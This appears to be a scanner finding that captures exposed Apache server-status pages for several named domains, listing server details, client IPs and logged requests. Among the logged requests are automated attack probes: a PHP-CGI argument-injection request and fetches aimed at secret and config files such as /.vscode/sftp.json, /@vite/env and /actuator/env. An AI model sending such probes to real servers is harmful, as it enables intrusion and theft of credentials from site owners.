64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-2837958190/0/1197_ 0.00149314789560.00.0032.47 172.69.176.8h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2837958190/1/1189_ 0.0314028945540.00.0033.08 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 0-2837958190/0/1204_ 0.001345614706040.00.0060.72 172.70.142.209h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-2837958190/1/1157_ 0.0313013590460.00.0034.81 139.59.231.238http/1.1pre.relehse.com:80GET /v3/api-docs HTTP/1.1 0-2837958190/0/1207_ 0.001265915867270.00.0027.44 172.69.165.2h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2837958210/6/4544_ 0.1333055610450.00.01131.43 146.190.242.161http/1.1pre.relehse.com:443GET /server HTTP/1.1 1-2837958210/4/4562_ 0.1320108251020.00.03118.23 139.59.231.238http/1.1pre.relehse.com:80GET /v2/_catalog HTTP/1.1 1-2837958210/4/4561_ 0.113064732010.00.01121.99 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-2837958210/4/4513_ 0.1524452717830.00.02127.13 146.190.242.161http/1.1pre.relehse.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2837958210/5/4573_ 0.1502958259080.00.14141.36 146.190.242.161http/1.1pre.relehse.com:443GET /login.action HTTP/1.1 1-2837958210/3/4585_ 0.121065045440.00.00133.48 139.59.231.238http/1.1pre.relehse.com:80GET /@vite/env HTTP/1.1 1-2837958210/8/4633_ 0.150064190290.00.04124.92 139.59.231.238http/1.1pre.relehse.com:80GET /server-status HTTP/1.1 1-2837958210/7/4646_ 0.132078434050.00.18125.83 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-2837958210/6/4569_ 0.134040459500.00.01118.55 139.59.231.238http/1.1pre.relehse.com:80GET /debug/default/view?panel=config HTTP/1.1 1-2837958210/7/4629_ 0.150041449120.00.12112.17 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-2837958220/1/3312_ 0.01232934724810.00.0078.16 146.190.242.161http/1.1pre.relehse.com:443POST /api HTTP/1.1 2-2837958220/0/3333_ 0.002337827938770.00.0088.28 172.71.124.89h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2837958220/1/3339_ 0.01223127813700.00.00134.78 146.190.242.161http/1.1pre.relehse.com:443POST /graphql/api HTTP/1.1 2-2837958220/0/3287_ 0.0022026164200.00.0064.83 185.247.137.5http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2837958220/1/3286_ 0.0114041744550.00.0074.27 139.59.231.238http/1.1pre.relehse.com:80GET /v2/api-docs HTTP/1.1 2-2837958220/0/3277_ 0.001335326342580.00.0094.10 172.68.164.5h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2837958220/1/3265_ 0.0213026090170.00.00113.66 146.190.242.161http/1.1pre.relehse.com:443GET /server-status HTTP/1.1 2-2837958220/0/3209_ 0.009657526284020.00.0063.67 172.68.27.204h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2837958220/0/3307_ 0.00962625318520.00.0094.72 188.114.111.92h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2837958220/0/3178_ 0.00962626208590.00.0064.48 87.236.176.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-2837958200/2/1940_ 0.0310019409760.00.1279.91 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-2837958200/0/1987_ 0.002248179214260.00.0075.25 172.69.132.166h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2837958200/0/1961_ 0.00943219424000.00.0058.99 108.162.212.163h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2837958200/1/1993_ 0.0222019703750.00.0039.48 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 3-2837958200/1/1915_ 0.038019188930.00.00100.74 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-2837958200/0/1876_ 0.002260718470930.00.0095.56 172.71.254.54h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2837958200/0/1934_ 0.0079719637880.00.0082.04 45.61.185.220http/1.1barrerasdecontencion.com:443POST /wp-login.php HTTP/1.1 3-2837958200/1/1863_ 0.02123218135290.00.0076.66 146.190.242.161http/1.1pre.relehse.com:443GET /api-docs/swagger.json HTTP/1.1 3-2837958200/1/1999W 0.020018556650.00.0051.65 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-2837958200/0/1874_ 0.001240317664590.00.0059.31 172.71.2.169h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2837959520/9/4158_ 0.1423644435300.00.0696.26 146.190.242.161http/1.1pre.relehse.com:443GET /debug/default/view?panel=config HTTP/1.1 4-2837959520/6/4088_ 0.132045181970.00.0380.45 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-2837959520/6/4153_ 0.150064368090.00.0894.16 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 4-2837959520/7/4120_ 0.150080467320.00.01124.01 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-2837959520/4/4103_ 0.140040014910.00.0399.61 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-2837959520/9/4046_ 0.140071577300.00.01103.34 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b2797e775e7
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 30-Nov-2025 22:56:49 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 423 Parent Server MPM Generation: 422 Server uptime: 79 days 10 hours 35 minutes 46 seconds Server load: 0.08 0.06 0.07 Total accesses: 2471010 - Total Traffic: 75.8 GB - Total Duration: 1588530013 CPU Usage: u207.64 s265.24 cu13768.3 cs7908.29 - .323% CPU load .36 requests/sec - 11.6 kB/second - 32.2 kB/request - 642.867 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01573631no0yes010000 11573632no0yes19000 21573765no0yes010000 31573630no1yes010000 41573633no0yes010000 Sum501 149000 __________W_______________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-42215736310/119/45525_ 16.116170340316670.02.011681.26 172.68.134.196h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-42215736310/131/44918_ 16.106230495253930.02.641441.58 172.68.135.79h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/122/45484_ 16.106170227860740.02.941456.74 172.68.135.13h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-42215736310/127/45110_ 16.116170222175100.02.951493.51 104.22.7.55h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/135/45821_ 16.116170215254950.02.951535.12 172.68.134.206h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/102/45322_ 16.106170215125870.01.701540.32 172.68.135.184h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/110/45505_ 16.126170297904890.04.861442.17 104.22.7.170h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/129/44856_ 16.126170224492650.01.261532.07 172.68.134.174h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/122/45654_ 16.116170219847730.01.901416.92 104.22.7.23h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-42215736310/119/45438_ 16.106170329576490.02.481646.18 172.68.134.196h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/239/50613W 20.9000231487440.03.971665.86 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-42215736320/211/51072_ 20.9050269708850.03.081653.43 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-42215736320/225/50715_ 20.9030287533500.05.401566.29 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-42215736320/221/50643_ 20.9050729046660.03.971541.91 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-42215736320/223/51159_ 20.750428431592990.03.541603.59 172.64.198.44h2lcftech.es:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-42215736320/197/51838_ 20.75222249896020.02.091568.01 162.158.172.94h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/209/50960_ 20.9010282965900.04.571533.98 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-42215736320/210/51600_ 20.9030228341280.05.241553.30 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-42215736320/216/49770_ 20.796606359771960.03.441401.54 141.101.76.163h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-42215736320/218/51235_ 20.825641490738510.03.871495.54 172.69.70.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/110/48250_ 14.846180261751650.01.571437.81 104.22.7.169h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/104/47462_ 14.952771391401726830.01.541367.71 172.64.200.235h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/97/48136_ 14.846230309854400.01.231500.29 172.68.135.218h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/108/47185_ 14.758610241748820.05.911419.50 172.69.114.99h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/107/47517_ 14.846180251658660.01.641580.44 172.68.135.154h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/95/48004_ 14.846180248801040.08.271399.37 172.68.135.87h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/120/47590_ 14.61618407226313090.02.101447.82 172.71.144.135h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/111/47882_ 14.846230256000480.05.011447.44 104.22.7.41h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/96/47817_ 14.842720251672170.01.701621.76 104.22.7.139h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42215737650/101/48241_ 14.842710268603730.01.621498.87 104.22.7.40h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/21/55380_ 10.2120334949980.00.321706.31 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-42215736300/15/53982_ 10.076729300719640.01.601513.83 172.68.134.234h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42215736300/14/55269_ 9.93429336183680.00.181686.13 188.114.111.81h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-42215736300/19/54379_ 10.2010357380140.00.161802.90 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-42215736300/17/54803_ 10.2210284950800.00.191568.66 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-42215736300/16/54716_ 10.2140270972240.00.161700.93 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-42215736300/15/55180_ 10.2200305906160.00.221736.05 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-42215736300/18/54960_ 10.2020390468930.00.211725.65 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-42215736300/12/54110_ 10.2140924592370.00.131647.34 139.59.143.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-42215736300/22/55399_ 10.191891409564530.00.221628.92 162.158.23.81h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/11/48150_ 9.95618378414264930.00.091577.48 172.68.134.234h2lcftech.es:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-42215736330/9/48350_ 9.20614224287490290.00.101585.28 172.69.67.70h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-42215736330/9/48347_ 9.936180245966650.00.021605.30 172.68.135.204h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/7/48559_ 9.936180266666470.00.071526.05 172.68.134.107h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42215736330/12/47795_ 9.936180278841080.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b2710ecb906
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 28-Nov-2025 15:24:46 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 410 Parent Server MPM Generation: 409 Server uptime: 77 days 3 hours 3 minutes 43 seconds Server load: 0.06 0.08 0.09 Total accesses: 2434189 - Total Traffic: 74.7 GB - Total Duration: 1536085608 CPU Usage: u291.83 s294.48 cu13376 cs7653.88 - .324% CPU load .365 requests/sec - 11.8 kB/second - 32.2 kB/request - 631.046 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01303575no0yes010000 11303576no0yes010000 21303577no0yes010000 31303574no3yes010011 41303714no2yes19011 Sum505 149022 ___________________________________________W______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-40913035750/126/44813_ 21.922160335334250.01.311657.28 172.70.83.109h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40913035750/115/44226_ 21.8213000490003200.03.741427.90 172.71.156.204h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40913035750/129/44790_ 21.6513000222131320.03.711438.39 172.64.198.51h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40913035750/119/44372_ 21.9213010217027680.02.331475.21 172.68.7.170h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40913035750/115/45134_ 21.31130087208839950.03.531511.64 147.182.200.94http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40913035750/143/44637_ 22.322210210129880.025.791520.63 172.64.217.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40913035750/106/44851_ 21.922160292983410.02.341415.32 172.70.83.77h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40913035750/114/44160_ 21.9213010218728280.02.971504.92 108.162.212.39h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40913035750/111/44975_ 21.9413020214532380.02.451401.96 172.71.156.170h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-40913035750/112/44733_ 21.942210325165350.02.331629.78 172.70.55.91h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40913035760/286/50044_ 31.372210224975700.06.071650.93 172.70.248.164h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40913035760/267/50548_ 31.812160266920970.03.731639.96 172.70.34.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40913035760/301/50167_ 31.3222127277802080.010.841550.44 52.169.206.229http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40913035760/294/50075_ 32.002212718189590.04.101509.73 172.64.217.122h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40913035760/262/50608_ 31.382160242531090.09.091588.48 172.71.127.126h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40913035760/253/51279_ 32.002210241968220.07.621553.76 172.64.217.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40913035760/291/50414_ 31.357950274636070.013.021517.27 104.23.225.163h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40913035760/352/51041_ 31.637900224638760.07.371527.74 172.70.255.122h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40913035760/251/49205_ 31.3221631352997560.06.991366.29 52.169.206.229http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-40913035760/244/50674_ 31.637910478058170.011.561479.13 172.68.7.113h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40913035770/406/47395_ 40.127890253657180.010.641420.21 104.23.213.121h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40913035770/462/46617_ 40.117900394330970.08.491349.73 104.23.213.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40913035770/424/47303_ 39.9280303589220.022.641469.11 108.162.212.8h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40913035770/367/46357_ 40.122160232723960.014.791392.58 172.68.244.202h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40913035770/413/46661_ 40.127890208558370.09.871559.48 172.68.138.184h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40913035770/392/47153_ 39.932211241760380.09.121373.73 172.69.132.160h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40913035770/460/46722_ 40.312210220225360.017.451425.01 172.69.34.199h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40913035770/390/46975_ 39.922160248946890.011.751425.85 108.162.210.102h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-40913035770/449/46951_ 40.3780243095940.032.401603.94 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 2-40913035770/434/47405_ 39.367905263488400.09.701456.35 104.197.69.115h2cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40913035740/399/55091_ 37.6340332621880.09.391700.68 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 3-40913035740/402/53697_ 37.6340299094370.08.051505.01 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-40913035740/400/55000_ 37.6330331981600.07.391678.75 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-40913035740/408/54085_ 37.651338355027960.05.801795.94 172.70.142.8http/1.1lcftech.es:443POST /xmlrpc.php HTTP/2.0 3-40913035740/489/54496_ 37.6520283068830.06.721560.14 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-40913035740/430/54429_ 37.5650267360650.09.451694.27 172.70.142.8h2lcftech.es:443POST /xmlrpc.php HTTP/2.0 3-40913035740/503/54901_ 37.6142303372200.07.451725.28 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40913035740/403/54681_ 37.6430387493130.011.171718.47 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-40913035740/395/53820_ 37.6330922629870.07.891639.01 172.68.135.156h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-40913035740/414/55126_ 37.573232408003480.010.471622.92 172.70.179.99h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-40913037140/821/46855_ 65.4010407312840.081.001541.63 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 4-40913037140/885/47038_ 65.4010280774870.033.141542.47 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-40913037140/884/47090_ 65.4210238625620.016.911572.53 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-40913037140/820/47238W 65.4200254720490.021.171491.88 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-40913037140/791/46471_ 6
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b279f0b31ea
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 26-Nov-2025 21:52:50 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 398 Parent Server MPM Generation: 397 Server uptime: 75 days 9 hours 31 minutes 47 seconds Server load: 0.02 0.05 0.06 Total accesses: 2381173 - Total Traffic: 73.2 GB - Total Duration: 1486747601 CPU Usage: u313.69 s295.8 cu13011.5 cs7462.35 - .324% CPU load .366 requests/sec - 11.8 kB/second - 32.2 kB/request - 624.376 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0989408no0yes19000 1989266no0yes010000 2989371no2yes010000 3989268no0yes010000 4989267no0yes010000 Sum502 149000 ______W___________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3979894080/498/43863_ 39.22266247327264070.022.961614.74 172.70.43.53h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-3979894080/462/43371_ 39.148292484939370.016.271399.47 172.64.217.205h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/453/43874_ 40.28271920198042930.09.921415.57 162.158.154.231h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/444/43480_ 39.3926614209738030.011.121438.24 89.187.162.104h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/470/44274_ 40.09834141203764720.011.461470.01 101.198.0.151http/1.1barrerasdecontencion.com:443GET /favicon.ico HTTP/1.1 0-3979894080/473/43782_ 39.138270204564870.018.331459.69 104.23.251.51h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/445/44003W 39.1400284400370.016.271395.10 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-3979894080/445/43293_ 40.108326215040020.022.911481.14 101.198.0.179http/1.1barrerasdecontencion.com:443GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1 0-3979894080/603/44067_ 39.288270210414040.010.511382.32 162.158.120.144h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/511/43805_ 39.36829578318607880.026.461582.68 104.22.10.10h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/279/48951_ 34.1050216486040.025.191616.21 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-3979892660/361/49567_ 34.0810255935290.036.181612.67 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-3979892660/331/49183_ 34.1030263193360.09.241515.27 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-3979892660/331/49080_ 34.1040711356080.06.871486.97 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-3979892660/297/49655_ 33.905396235516140.09.701566.55 162.158.186.47h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/366/50322_ 34.0140230161140.010.081530.94 104.23.187.69h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/310/49372_ 34.1010264918470.06.371490.28 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-3979892660/318/49949_ 34.0230217197910.012.281500.10 162.158.63.194h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/311/48201_ 34.055262343264680.05.251345.11 172.71.120.127h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/334/49658_ 34.1020468467080.06.621452.31 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-3979893710/603/46594_ 51.4010247620730.015.881397.69 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-3979893710/701/45679_ 51.4010382756320.012.811332.04 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-3979893710/674/46435_ 51.3940297022100.028.541434.01 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-3979893710/654/45539_ 51.3900225610540.031.351368.37 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 2-3979893710/653/45824_ 51.4020200761940.017.751540.07 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3979893710/617/46294_ 51.4030217163710.019.001355.23 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-3979893710/581/45761_ 51.4000213523650.023.511396.08 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-3979893710/612/46113_ 51.2148242058090.026.821403.58 179.247.224.104http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3979893710/618/46058_ 51.3910235592010.013.841559.51 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 2-3979893710/653/46511_ 51.3800255682220.018.411436.94 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 3-3979892680/769/53850_ 63.376440322794560.015.061658.70 